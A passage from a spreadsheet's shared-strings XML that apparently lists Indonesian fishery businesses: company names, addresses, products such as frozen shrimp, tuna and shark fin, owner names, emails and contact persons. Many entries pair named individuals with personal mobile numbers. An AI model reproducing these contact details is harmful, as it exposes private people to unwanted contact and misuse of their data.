    <t>Ir. Fredyanto Oetomo</t>
  </si>
  <si>
    <t>Bulusan</t>
  </si>
  <si>
    <t>windublambangansejati@ymail.com</t>
  </si>
  <si>
    <t>Ridwan Slamet, Taufik 085234567188</t>
  </si>
  <si>
    <t>Gun Winardi</t>
  </si>
  <si>
    <t>CV. INDO OCEAN</t>
  </si>
  <si>
    <t>Kp. Kojan RT 007 RW 006, Kel. Kalideres, Kec. Kalideres, Kota Jakarta Barat</t>
  </si>
  <si>
    <t>Kerapu Hidup</t>
  </si>
  <si>
    <t>Devi Arianti</t>
  </si>
  <si>
    <t>indooceanjkt@yahoo.com</t>
  </si>
  <si>
    <t>021-54392888</t>
  </si>
  <si>
    <t>Endah, Asep 0877-7711-1171</t>
  </si>
  <si>
    <t>PT. MARINA MAKMUR SEJAHTERA</t>
  </si>
  <si>
    <t>Jl. Raya Salembaran Komplek Pergudangan Royal Kosambi Blok D6 RT 006 RW 003, Kel. Cengklong, Kec. Kosambi, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Daging Tuna Beku</t>
  </si>
  <si>
    <t>LENI KRISTINA</t>
  </si>
  <si>
    <t>Cengklong</t>
  </si>
  <si>
    <t>marinamakmursejahtera@yahoo.com</t>
  </si>
  <si>
    <t>021-5437327</t>
  </si>
  <si>
    <t>ROHMAN DAN 082213428</t>
  </si>
  <si>
    <t>ROHMAN</t>
  </si>
  <si>
    <t>NGUDI LESTARI</t>
  </si>
  <si>
    <t>Mendongan, Kel. Bandung, Kec. Playen, Kabupaten Gunung Kidul</t>
  </si>
  <si>
    <t>Lainnya, Kering</t>
  </si>
  <si>
    <t>Lanting Rumput Laut, Lanting Lele</t>
  </si>
  <si>
    <t>Ismini</t>
  </si>
  <si>
    <t>Playen</t>
  </si>
  <si>
    <t>Bandung</t>
  </si>
  <si>
    <t>ismingudilestari@gmail.com</t>
  </si>
  <si>
    <t>Ismini &amp; 0818461185</t>
  </si>
  <si>
    <t>PT. WINAROS KAWULA BAHARI</t>
  </si>
  <si>
    <t>Jl. Raya Cangkringmalang Km 39,4, Kel. Cangkringmalang, Kec. Beji, Kabupaten Pasuruan</t>
  </si>
  <si>
    <t>Udang Mentah Beku, Udang Rebus Beku, Udang Berlapis Tepung Beku</t>
  </si>
  <si>
    <t>Yohanes Nawir</t>
  </si>
  <si>
    <t>Beji</t>
  </si>
  <si>
    <t>Cangkringmalang</t>
  </si>
  <si>
    <t>caroline@winaros.co.id</t>
  </si>
  <si>
    <t>0343-656901</t>
  </si>
  <si>
    <t>Caroline 08175277798</t>
  </si>
  <si>
    <t>John Guntar Sebayang</t>
  </si>
  <si>
    <t>CV. GEMBIRA GALESONG</t>
  </si>
  <si>
    <t>Jl. Abdul Kadir No.5, Kel. Gallesong Kota, Kec. Galesong , Kabupaten Takalar</t>
  </si>
  <si>
    <t>Teripang Kering</t>
  </si>
  <si>
    <t>MUHAMMAD SALEH</t>
  </si>
  <si>
    <t xml:space="preserve">Galesong </t>
  </si>
  <si>
    <t>Gallesong Kota</t>
  </si>
  <si>
    <t>isman.muhammad07@gmail.com</t>
  </si>
  <si>
    <t>Saleh 08114441241, Isman 085246726818</t>
  </si>
  <si>
    <t>Gudang Penyimpanan Kering</t>
  </si>
  <si>
    <t>CV. BENING JATI ANUGRAH</t>
  </si>
  <si>
    <t>Kp. Jati Parung RT 003 RW 004 No. 106, Kel. Parung, Kec. Parung, Kabupaten Bogor</t>
  </si>
  <si>
    <t>Purnanik</t>
  </si>
  <si>
    <t>Parung</t>
  </si>
  <si>
    <t>kurniasihsri11@gmail.com</t>
  </si>
  <si>
    <t>purnanik / 081316574</t>
  </si>
  <si>
    <t>PT. PANCA MITRA MULTIPERDANA - PLANT 2</t>
  </si>
  <si>
    <t>Jl. Raya Wonokoyo No.3, Dusun Laok Bindung RT 02 RW 03, Kel. Landangan, Kec. Kapongan, Kabupaten Situbondo</t>
  </si>
  <si>
    <t>Udang Mentah Beku, Udang Rebus Beku</t>
  </si>
  <si>
    <t>Martinus Soesilo</t>
  </si>
  <si>
    <t>Kapongan</t>
  </si>
  <si>
    <t>Landangan</t>
  </si>
  <si>
    <t>qc.stb@pancamitra.com</t>
  </si>
  <si>
    <t>0338-672221</t>
  </si>
  <si>
    <t>Riris 08113500387</t>
  </si>
  <si>
    <t>Suyud Kusrinto</t>
  </si>
  <si>
    <t>PT. JAVA SEAFOOD</t>
  </si>
  <si>
    <t>Desa Eretan Kulon, Kec. Kandang Haur, Kabupaten Indramayu</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Ikan Air Tawar Beku, Udang Beku, Surimi Beku, Ikan Kering, Cephalopoda Semi Kering, Cephalopoda Bernilai Tambah Beku</t>
  </si>
  <si>
    <t>Woo Jung Wan</t>
  </si>
  <si>
    <t>Kandang Haur</t>
  </si>
  <si>
    <t>Eretan Kulon</t>
  </si>
  <si>
    <t>adhe@java-seafood.com</t>
  </si>
  <si>
    <t>Ridin 081324670097</t>
  </si>
  <si>
    <t>CV. DZAKWANI FOOD</t>
  </si>
  <si>
    <t>Kalimantan Timur</t>
  </si>
  <si>
    <t>Jl. Cakalang RT 23 No.75, Kel. Manggar Baru, Kec. Balikpapan Timur, Kota Balikpapan</t>
  </si>
  <si>
    <t>Amplang Ikan, Abon Kepiting</t>
  </si>
  <si>
    <t>ANSHORI, S.HUT</t>
  </si>
  <si>
    <t>Balikpapan Timur</t>
  </si>
  <si>
    <t>Manggar Baru</t>
  </si>
  <si>
    <t>bontingsbalikpapan@gmail.com</t>
  </si>
  <si>
    <t>0542-743247</t>
  </si>
  <si>
    <t>Ansori 081346349957</t>
  </si>
  <si>
    <t>PT. PRIMO INDO IKAN</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna I No.1 Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Demersal Segar, Tuna Segar, Ikan Pelagis Segar, Tuna Beku</t>
  </si>
  <si>
    <t>Lucas Jon Papierniak</t>
  </si>
  <si>
    <t>Denpasar Selatan</t>
  </si>
  <si>
    <t>Pedungan</t>
  </si>
  <si>
    <t>syilfiaidianisari@yahoo.co.id</t>
  </si>
  <si>
    <t>62-361-720803</t>
  </si>
  <si>
    <t>Agung Adhinatha / +62 353122626, I Putu Eka Y 085707050998</t>
  </si>
  <si>
    <t>Agung Adhinatha</t>
  </si>
  <si>
    <t>UD. DAMENA</t>
  </si>
  <si>
    <t>Jl. By Pass Ngurah Rai Gg. Mina Utama No.8A, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Ikan Demersal Segar, Tuna Segar, Ikan Demersal Beku, Ikan Pelagis Beku, Tuna Beku, Cephalopoda Beku, Ikan Pelagis Segar</t>
  </si>
  <si>
    <t>Komang Ari Widiyanti</t>
  </si>
  <si>
    <t xml:space="preserve">Pedungan </t>
  </si>
  <si>
    <t>amira_lucue@rocketmail.com</t>
  </si>
  <si>
    <t>Amira 082146936389</t>
  </si>
  <si>
    <t>I Kadek Yuliastawa</t>
  </si>
  <si>
    <t>CV. USAHA SURYA DUA PUTHRA</t>
  </si>
  <si>
    <t>Kalimantan Utara</t>
  </si>
  <si>
    <t>Jl. Kurau RT 16 No.128, Kel. Juata Laut, Kec. Tarakan Utara, Kota Tarakan</t>
  </si>
  <si>
    <t>Bandeng Beku</t>
  </si>
  <si>
    <t>H. MUHAMMAD TANG</t>
  </si>
  <si>
    <t>Tarakan Utara</t>
  </si>
  <si>
    <t>Juata Laut</t>
  </si>
  <si>
    <t>rais.usdp@yahoo.com</t>
  </si>
  <si>
    <t>JUMRAIS 082214811439</t>
  </si>
  <si>
    <t>H. SURYADI</t>
  </si>
  <si>
    <t>PT. WILMAX BRILIAN PERKASA</t>
  </si>
  <si>
    <t>Jl. Marsekal Surya Dharma Pergudangan Bandara Mas Blok A9, Kel. Selapang Jaya, Kec. Neglasari, Kota Tangerang</t>
  </si>
  <si>
    <t>Lobster Hidup, Udang Ronggeng Hidup, Kerapu Hidup</t>
  </si>
  <si>
    <t>paulus hanafia</t>
  </si>
  <si>
    <t>Neglasari</t>
  </si>
  <si>
    <t>Selapang Jaya</t>
  </si>
  <si>
    <t>ptwilmaxbrilianperkasa@gmail.com</t>
  </si>
  <si>
    <t>-</t>
  </si>
  <si>
    <t>wiliam hanafia</t>
  </si>
  <si>
    <t>CV. ALAM LAUT</t>
  </si>
  <si>
    <t>Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang</t>
  </si>
  <si>
    <t>Beku, Kering, Lainnya, Segar</t>
  </si>
  <si>
    <t>Rajungan Beku, Hiu Beku, Telur Ikan Beku, Udang Beku, Lobster Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Kepiting Beku, Cephalopoda Beku, Udang Ronggeng Beku, Tuna Beku, Sirip Hiu Kering, Daging Kerang Kering, Udang Kering, Teripang Kering, Ikan Asin Kering, Perut Ikan Kering, Kerang Hidup, Keong Hidup, Udang Ronggeng Hidup, Kerapu Hidup, Lobster Hidup, Kepiting Hidup, Ikan Air Tawar Hidup, Lobster Air Tawar Hidup, Belut Hidup, Ikan Pelagis Segar, Teripang Segar, Udang Segar, Tuna Segar, Pari Segar, Rajungan Segar, Lobster Segar, Ikan Demersal Segar, Cephalopoda Kering</t>
  </si>
  <si>
    <t>SUHADI</t>
  </si>
  <si>
    <t>Selapajang Jaya</t>
  </si>
  <si>
    <t>cvalamlautindonesia@gmail.com</t>
  </si>
  <si>
    <t>021-55951000</t>
  </si>
  <si>
    <t>AHMAD ALI 082218770582</t>
  </si>
  <si>
    <t>CV. SAKANA INDO PRIMA</t>
  </si>
  <si>
    <t>Parung Poncol RT 004 RW 002, Kel. Duren Mekar, Kec. Bojongsari, Kota Depok</t>
  </si>
  <si>
    <t>Saefudin-Redy Ardiansyah</t>
  </si>
  <si>
    <t>Bojongsari</t>
  </si>
  <si>
    <t>Duren Mekar</t>
  </si>
  <si>
    <t>santpray@gmail.com</t>
  </si>
  <si>
    <t>Santoso Prayitno 085724006401</t>
  </si>
  <si>
    <t>Santoso Prayitno</t>
  </si>
  <si>
    <t>CV. MAROS TIMUR JAYA</t>
  </si>
  <si>
    <t>Jl. Poros Makassar - Maros, Dusun Bulutanae, Kel. Marumpa, Kec. Marusu, Kabupaten Maros</t>
  </si>
  <si>
    <t>Segar, Lainnya</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar, Ikan Demersal Segar, Kepiting Hidup</t>
  </si>
  <si>
    <t>JOHANTO</t>
  </si>
  <si>
    <t>Marusu</t>
  </si>
  <si>
    <t>Marumpa</t>
  </si>
  <si>
    <t>johantokhang6@gmail.com</t>
  </si>
  <si>
    <t>JOHANTO 0821474220</t>
  </si>
  <si>
    <t>PT. GLOBAL BUANA MANDIRI</t>
  </si>
  <si>
    <t>Jl. Muara Baru Blok A No.1-3 RT 06 RW 07, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Rumput Laut Panggang</t>
  </si>
  <si>
    <t>KHARIS</t>
  </si>
  <si>
    <t>ptglobalbuanamandiri@gmail.com</t>
  </si>
  <si>
    <t>021-6302851, 021-6911496</t>
  </si>
  <si>
    <t>LISNIE  081808332457, Sokhibul Anwar 083807533322</t>
  </si>
  <si>
    <t>PT. SINAR SEJAHTERA SENTOSA</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok E No.2, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Tuna Segar, Tuna Beku, Ikan Pelagis Beku, Cephalopoda Beku, Bandeng Beku, Udang Beku, Udang Kipas Beku, Ikan Berlapis Tepung Beku, Ikan Demersal Beku, Salmon Beku</t>
  </si>
  <si>
    <t>TRACY VERONICA</t>
  </si>
  <si>
    <t>kartika.qc@gmail.com</t>
  </si>
  <si>
    <t>KARTIKA SARI 081288095477</t>
  </si>
  <si>
    <t>UD. HORAS BARU</t>
  </si>
  <si>
    <t>Jl. Cendrawasih No.21, Kel. Beting Kuala Kapias, Kec. Teluk Nibung, Kota Tanjung Balai</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>sutarto sebastian</t>
  </si>
  <si>
    <t>Beting Kuala Kapias</t>
  </si>
  <si>
    <t>mentarinelayan@hotmail.com</t>
  </si>
  <si>
    <t>Sutarto Sebastian 085275621186</t>
  </si>
  <si>
    <t>PT. SURYA ALAM TUNGGAL</t>
  </si>
  <si>
    <t>Jl. Kusuma Bangsa No.60 RT 15 RW 01, Kel. Gunung Lingkas, Kec. Tarakan Timur, Kota Tarakan</t>
  </si>
  <si>
    <t>Udang Mentah Beku</t>
  </si>
  <si>
    <t>THE RONALD SUTENO</t>
  </si>
  <si>
    <t>Tarakan Timur</t>
  </si>
  <si>
    <t>Gunung Lingkas</t>
  </si>
  <si>
    <t>sattarakan@gmail.com</t>
  </si>
  <si>
    <t>(0551) 30575</t>
  </si>
  <si>
    <t>THE RONALD SUTENO/08</t>
  </si>
  <si>
    <t>CV. SEA MALAKA TRADE</t>
  </si>
  <si>
    <t>Jl. Ampera Dusun V, Kel. Bagan Asahan Pekan, Kec. Tanjung Balai, Kabupaten Asahan</t>
  </si>
  <si>
    <t>Kering, Segar, Beku</t>
  </si>
  <si>
    <t>Udang Kering, Ikan Asin Kering, Ikan Pelagis Segar, Ikan Demersal Segar, Udang Kupas Beku, Ikan Air Tawar Segar, Udang Segar, Cephalopoda Segar, Kerang Segar, Kepiting Segar</t>
  </si>
  <si>
    <t>ISMET SILAEN</t>
  </si>
  <si>
    <t>Tanjung Balai</t>
  </si>
  <si>
    <t>Bagan Asahan Pekan</t>
  </si>
  <si>
    <t>bemsmiet64@gmail.com</t>
  </si>
  <si>
    <t xml:space="preserve">rezeki silaen </t>
  </si>
  <si>
    <t>PT. INDUSTRI PERIKANAN TERPADU CHIU SHIH</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna Barat Raya II, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Hiu Beku, Bandeng Beku, Cephalopoda Beku, Tuna Segar, Tuna Beku, Ikan Pelagis Beku, Sirip Hiu Beku</t>
  </si>
  <si>
    <t>ANNY</t>
  </si>
  <si>
    <t xml:space="preserve">Denpasar Selatan </t>
  </si>
  <si>
    <t>d.kusuma2707@gmail.com</t>
  </si>
  <si>
    <t>0361-4480232, 0361-724762</t>
  </si>
  <si>
    <t>ANNY 08123812780, Nasikah 083832039254</t>
  </si>
  <si>
    <t>CV. LAUT JAYA</t>
  </si>
  <si>
    <t>Kompleks Pelabuhan Perikanan Nusantara Tanjung Pandan Jl. R.E. Martadinata RT 007 RW 002, Kel. Kota, Kec. Tanjung Pandan, Kabupaten Belitung</t>
  </si>
  <si>
    <t>Fillet Ikan Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>ARIPIN WIJAYA</t>
  </si>
  <si>
    <t>jayalaut@yahoo.com</t>
  </si>
  <si>
    <t>PT. ALTER TRADE INDONESIA</t>
  </si>
  <si>
    <t>Jl. Industri No.72, Kel. Sukorejo, Kec. Buduran, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Campuran Seafood Beku, Udang Beku, Udang Berlapis Tepung Beku</t>
  </si>
  <si>
    <t>HARRY YULI SUSANTO</t>
  </si>
  <si>
    <t>Buduran</t>
  </si>
  <si>
    <t>Sukorejo</t>
  </si>
  <si>
    <t>wawan@atina.co.id</t>
  </si>
  <si>
    <t>031-8911230</t>
  </si>
  <si>
    <t>ETIK SETIYO PURNOMO / 085640003342</t>
  </si>
  <si>
    <t>PT. HIDUP SAMUDERA JAYA</t>
  </si>
  <si>
    <t>Wilayah Jaga IX, Desa Maumbi, Kec. Kalawat, Kabupaten Minahasa Utara</t>
  </si>
  <si>
    <t>Lobster Hidup, Kepiting Hidup, Ikan Demersal Hidup, Teripang Kering</t>
  </si>
  <si>
    <t>PT. Hidup Samudera Jaya</t>
  </si>
  <si>
    <t>Kalawat</t>
  </si>
  <si>
    <t>Maumbi</t>
  </si>
  <si>
    <t>inyohendriks35@gmail.com</t>
  </si>
  <si>
    <t>Albertus Heriyanto, SPi</t>
  </si>
  <si>
    <t>PT. BUMI PANGAN UTAMA</t>
  </si>
  <si>
    <t>Oei Harry Lumito</t>
  </si>
  <si>
    <t>yenny@bumipanganutama.com</t>
  </si>
  <si>
    <t>021-2259 9232</t>
  </si>
  <si>
    <t>Yenny Rahmawati / 081555608355</t>
  </si>
  <si>
    <t>Arif Hidayat</t>
  </si>
  <si>
    <t>KOPERASI PERIKANAN SANTO ALVIN PRATAMA</t>
  </si>
  <si>
    <t>Maluku Utara</t>
  </si>
  <si>
    <t>Kompleks Pelabuhan Perikanan Pantai Bacan, Kel. Panamboang, Kec. Bacan Selatan, Kabupaten Halmahera Selatan</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Tuna Beku, Ikan Pelagis Beku, Tuna Segar, Ikan Demersal Segar</t>
  </si>
  <si>
    <t>HERMANTO</t>
  </si>
  <si>
    <t>Bacan Selatan</t>
  </si>
  <si>
    <t>Panamboang</t>
  </si>
  <si>
    <t>saptte09@gmail.com</t>
  </si>
  <si>
    <t>HERMANTO 081236850891</t>
  </si>
  <si>
    <t>UPTD PPP BACAN</t>
  </si>
  <si>
    <t>PT. MISAJA MITRA</t>
  </si>
  <si>
    <t>Jl. Raya Pati - Tayu Km 18, Kel. Waturoyo, Kec. Margoyoso, Kabupaten Pati</t>
  </si>
  <si>
    <t>Udang Beku, Udang Berlapis Tepung Beku</t>
  </si>
  <si>
    <t>FIEYONO HIU, PO-CHUN WU</t>
  </si>
  <si>
    <t>Margoyoso</t>
  </si>
  <si>
    <t>Waturoyo</t>
  </si>
  <si>
    <t>arisvikriyaanwar16071993@gmail.com</t>
  </si>
  <si>
    <t>(0295) 452255, 452715</t>
  </si>
  <si>
    <t>BUDIYONO HIU</t>
  </si>
  <si>
    <t>PT. DHARMINDO SAMUDRA ABADI</t>
  </si>
  <si>
    <t>Jl. Raya Sarang-Tuban No.89, Kel. Temperek, Kec. Sarang, Kabupaten Rembang</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Teri Nasi Kering</t>
  </si>
  <si>
    <t>SURY DERMAWAN</t>
  </si>
  <si>
    <t>Sarang</t>
  </si>
  <si>
    <t>Temperek</t>
  </si>
  <si>
    <t>dharmindo.samudra@yahoo.com</t>
  </si>
  <si>
    <t>0356-411789</t>
  </si>
  <si>
    <t xml:space="preserve">INDAH ANIS ROHMATIN </t>
  </si>
  <si>
    <t>SUTRISMAN</t>
  </si>
  <si>
    <t>PT. AGROMINA WICAKSANA</t>
  </si>
  <si>
    <t>Jl. Berbek Industri V No.25 B, Kel. Berbek, Kec. Waru, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Udang Mentah Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>Ita Amalia</t>
  </si>
  <si>
    <t>Waru</t>
  </si>
  <si>
    <t>Berbek</t>
  </si>
  <si>
    <t>azhar300195@gmail.com</t>
  </si>
  <si>
    <t>Nur Fa'tunikmah</t>
  </si>
  <si>
    <t>CV. ARWANA MANDIRI</t>
  </si>
  <si>
    <t>Jl. Peternakan II Mangga Ubi No.24B RT 006 RW 007, Kel. Kapuk, Kec. Cengkareng, Kota Jakarta Barat</t>
  </si>
  <si>
    <t>Ikan Asin Kering</t>
  </si>
  <si>
    <t>TOMMY SULTAN</t>
  </si>
  <si>
    <t>Kapuk</t>
  </si>
  <si>
    <t>arwanamandiri22@gmail.com</t>
  </si>
  <si>
    <t>021-29509017, 081807904999</t>
  </si>
  <si>
    <t>Tommy 081808885585</t>
  </si>
  <si>
    <t>PT. CLASSIC FINE FOODS INDONESIA</t>
  </si>
  <si>
    <t>Komplek Pergudangan BGR, Jl. Boulevard BGR No.1, Kel. Kelapa Gading Barat, Kec. Kelapa Gading, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Tiram Beku, Abalone Beku, Lobster Beku, Salmon Beku, Trout Beku</t>
  </si>
  <si>
    <t>Thomas Pellegrini</t>
  </si>
  <si>
    <t>Jakarta Utara</t>
  </si>
  <si>
    <t>Kelapa Gading</t>
  </si>
  <si>
    <t>Kelapa Gading Barat</t>
  </si>
  <si>
    <t>suhandri@classic.co.id</t>
  </si>
  <si>
    <t>drh. suhandri  08159</t>
  </si>
  <si>
    <t>drh. Suhandri</t>
  </si>
  <si>
    <t>Importir/ Gudang Non RL</t>
  </si>
  <si>
    <t>PT. PEDULI LAUT MALUKU</t>
  </si>
  <si>
    <t>Jl. Raya Tulehu, Dusun Mamokeng, Kel. Tulehu, Kec. Salahutu, Kabupaten Maluku Tengah</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar, Tuna Utuh Segar, Tuna Utuh Beku</t>
  </si>
  <si>
    <t xml:space="preserve">THOMAS HOCK TUTUHATUNEWA </t>
  </si>
  <si>
    <t>Salahutu</t>
  </si>
  <si>
    <t>Tulehu</t>
  </si>
  <si>
    <t>thomashocktutuhatunewa@gmail.com</t>
  </si>
  <si>
    <t>THOM 081247021062 / ANGIE ALVERINA 081339705608</t>
  </si>
  <si>
    <t>PT. CILACAP SAMUDERA FISHING INDUSTRY</t>
  </si>
  <si>
    <t>Sulawesi Tenggara</t>
  </si>
  <si>
    <t>Kompleks PPS Kendari, Jl. Samudera No.1, Kel. Puday, Kec. Abeli, Kota Kendari</t>
  </si>
  <si>
    <t>cilacap samudera fishing industry</t>
  </si>
  <si>
    <t>Abeli</t>
  </si>
  <si>
    <t>Puday</t>
  </si>
  <si>
    <t>qckendari@arabikatama.com</t>
  </si>
  <si>
    <t>Teguh Santoso  0811405209</t>
  </si>
  <si>
    <t>Teguh Santoso</t>
  </si>
  <si>
    <t>PT. BAHARI BIRU NUSANTARA</t>
  </si>
  <si>
    <t>Jl. Daendels Km 82.6 No.88, Kel. Sedayulawas, Kec. Brondong, Kabupaten Lamongan</t>
  </si>
  <si>
    <t>Kerang Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Cephalopoda Beku, Udang Beku, Ikan Hasil Budidaya Beku, Tuna Beku</t>
  </si>
  <si>
    <t>Hadi Wijaja</t>
  </si>
  <si>
    <t>Brondong</t>
  </si>
  <si>
    <t>Sedayulawas</t>
  </si>
  <si>
    <t>qulity@baruna.net</t>
  </si>
  <si>
    <t>Faizah &amp; 08564945124</t>
  </si>
  <si>
    <t>Lismanto</t>
  </si>
  <si>
    <t>PT. NIHON NOVELICA FOOD</t>
  </si>
  <si>
    <t>Jl. Tugu Industri Raya No.4 Komplek Kawasan Industri Wijayakusuma, Kel. Randugarut, Kec. Tugu, Kota Semarang</t>
  </si>
  <si>
    <t>Kering, Beku</t>
  </si>
  <si>
    <t>Sirip Hiu Kering, Tulang Hiu Kering, Sirip Hiu Beku, Tulang Hiu Beku, Kepiting Beku, Daging Kepiting Beku, Pari Berbumbu Kering, Tulang Pari Kering</t>
  </si>
  <si>
    <t>Keiji Kashiwagi, Mr</t>
  </si>
  <si>
    <t>Tugu</t>
  </si>
  <si>
    <t>Randugarut</t>
  </si>
  <si>
    <t>nihonnovelicafood@gmail.com</t>
  </si>
  <si>
    <t>Ir. Maria Terry Endiawati 08113101234</t>
  </si>
  <si>
    <t>Ir. Maria Terry Endiawati</t>
  </si>
  <si>
    <t>PT. SARIFEED INDOJAYA</t>
  </si>
  <si>
    <t>Jl. Pelabuhan No. 35, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi</t>
  </si>
  <si>
    <t>Tepung Ikan, Minyak Ikan</t>
  </si>
  <si>
    <t>INDRAWAN</t>
  </si>
  <si>
    <t>krida_lidyawati@sarifeed.com</t>
  </si>
  <si>
    <t>Tita / +62 812-3782-6879</t>
  </si>
  <si>
    <t>LONG PRIYONO</t>
  </si>
  <si>
    <t>PT. GEMA MANGGALA CHEMINDO</t>
  </si>
  <si>
    <t>Pergudangan Biz Point Blok Hokkaido No.60, Jl. Raya Pemda Tigaraksa, Kel. Sukamulya, Kec. Cikupa, Kota Tangerang</t>
  </si>
  <si>
    <t>Reduksi, Lainnya</t>
  </si>
  <si>
    <t>Minyak Krill, Minyak Hati Cod, Minyak Salmon, Minyak Ikan, Squalene</t>
  </si>
  <si>
    <t>Yohanes Benny Srihono</t>
  </si>
  <si>
    <t>Cikupa</t>
  </si>
  <si>
    <t>Sukamulya</t>
  </si>
  <si>
    <t>marketing@gemachem.com</t>
  </si>
  <si>
    <t>021-22526454</t>
  </si>
  <si>
    <t>Lucia Gunarti 0878858</t>
  </si>
  <si>
    <t>Lucia Gunarti</t>
  </si>
  <si>
    <t>PT. UNITED OCEANS WORLDWIDE</t>
  </si>
  <si>
    <t>Jl. Semampar No.1 Komplek Workshop PHPT Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Pelagis Beku, Hiu Beku, Tuna Beku, Salmon Beku, Ikan Demersal Beku, Salmon Segar, Daging Tuna Beku</t>
  </si>
  <si>
    <t>Darmalipin</t>
  </si>
  <si>
    <t>ptunitedoceans@gmail.com</t>
  </si>
  <si>
    <t>Darmalipin 08121054599</t>
  </si>
  <si>
    <t>PT. DELTA AEROSUPPORT</t>
  </si>
  <si>
    <t>Desa Mindahan RT 02 RW 01, Kec. Batealit, Kabupaten Jepara</t>
  </si>
  <si>
    <t>Segar</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar, Ikan Demersal Segar, Scallop Segar, Cephalopoda Segar, Udang Segar</t>
  </si>
  <si>
    <t>PESERO</t>
  </si>
  <si>
    <t>Batealit</t>
  </si>
  <si>
    <t>Mindahan</t>
  </si>
  <si>
    <t>ferrywilianto07@gmail.com</t>
  </si>
  <si>
    <t>M. SUMAJI 0813250159</t>
  </si>
  <si>
    <t>FERRY WILIANTO</t>
  </si>
  <si>
    <t>SHIFODJI MANDIRI FOOD</t>
  </si>
  <si>
    <t>Jl. Mulawarman Gang Kompas No.29-30 RT 015, Kel. Manggar Baru, Kec. Balikpapan Timur, Kota Balikpapan</t>
  </si>
  <si>
    <t>Abon Kepiting, Amplang Ikan</t>
  </si>
  <si>
    <t>Hj. Nursia, SE</t>
  </si>
  <si>
    <t>shifodjimandirifood@gmail.com</t>
  </si>
  <si>
    <t>Saharuddin 081350730</t>
  </si>
  <si>
    <t>CV. SEMBILAN PUTRA JAYA</t>
  </si>
  <si>
    <t>Jl. Sultan Abdullah Raya No.43A, Kel. Tallo, Kec. Tallo, Kota Makassar</t>
  </si>
  <si>
    <t>Ikan Demersal Segar, Ikan Pelagis Segar</t>
  </si>
  <si>
    <t>IRFAN BUDU</t>
  </si>
  <si>
    <t>Tallo</t>
  </si>
  <si>
    <t>ivanperikananumi08@gmail.com</t>
  </si>
  <si>
    <t>PT. DUTA BUANA PACIFIC</t>
  </si>
  <si>
    <t>Komplek PPN Tanjungpandan, Jl. RE Martadinata RT 007 RW 002, Kel. Kota, Kec. Tanjungpandan, Kabupaten Belitung</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Cephalopoda Beku, Kerang Beku, Udang Kipas Beku, Ikan Demersal Beku, Siput Beku, Kepiting Lunak Beku</t>
  </si>
  <si>
    <t>Ngit Kong</t>
  </si>
  <si>
    <t>duta.buana@yahoo.com</t>
  </si>
  <si>
    <t>0719-23098</t>
  </si>
  <si>
    <t>0878 9648 5858, Vika 082282421719</t>
  </si>
  <si>
    <t>Ferry Susanto</t>
  </si>
  <si>
    <t>PT. KELOLA MINA LAUT UNIT LUWUK</t>
  </si>
  <si>
    <t>Sulawesi Tengah</t>
  </si>
  <si>
    <t>Jl. Raya - Luwuk Biak Km 8, Kel. Boyou, Kec. Luwuk Utara, Kabupaten Banggai</t>
  </si>
  <si>
    <t>Tuna Beku, Udang Beku, Ikan Demersal Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>Muhammad Najikh</t>
  </si>
  <si>
    <t>Luwuk Utara</t>
  </si>
  <si>
    <t>Boyou</t>
  </si>
  <si>
    <t>faluwuk@kmlseafood.com</t>
  </si>
  <si>
    <t>Catur 081235217645</t>
  </si>
  <si>
    <t>Catur Pujiono</t>
  </si>
  <si>
    <t>PT. MEGA MANDIRI SURABAYA</t>
  </si>
  <si>
    <t>Jl. Mohammad Noer 162 A, Kel. Bulak, Kec. Bulak, Kota Surabaya</t>
  </si>
  <si>
    <t>Perut Ikan Kering, Teripang Kering, Sirip Hiu Kering, Kulit Hiu Kering, Tulang Hiu Kering, Sirip Pari Kering, Kulit Pari Kering, Tulang Pari Kering, Daging Kerang Kering</t>
  </si>
  <si>
    <t>Gamma Wilasa, Anang Buntaran</t>
  </si>
  <si>
    <t>Bulak</t>
  </si>
  <si>
    <t>megamandiri24@yahoo.com</t>
  </si>
  <si>
    <t>(031) 51503269</t>
  </si>
  <si>
    <t>Novendra Aditya 082141007432</t>
  </si>
  <si>
    <t xml:space="preserve">Novendra Aditya </t>
  </si>
  <si>
    <t>PT. NAILI OCEAN</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok M No.1-2 (Cold Storage No 1), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
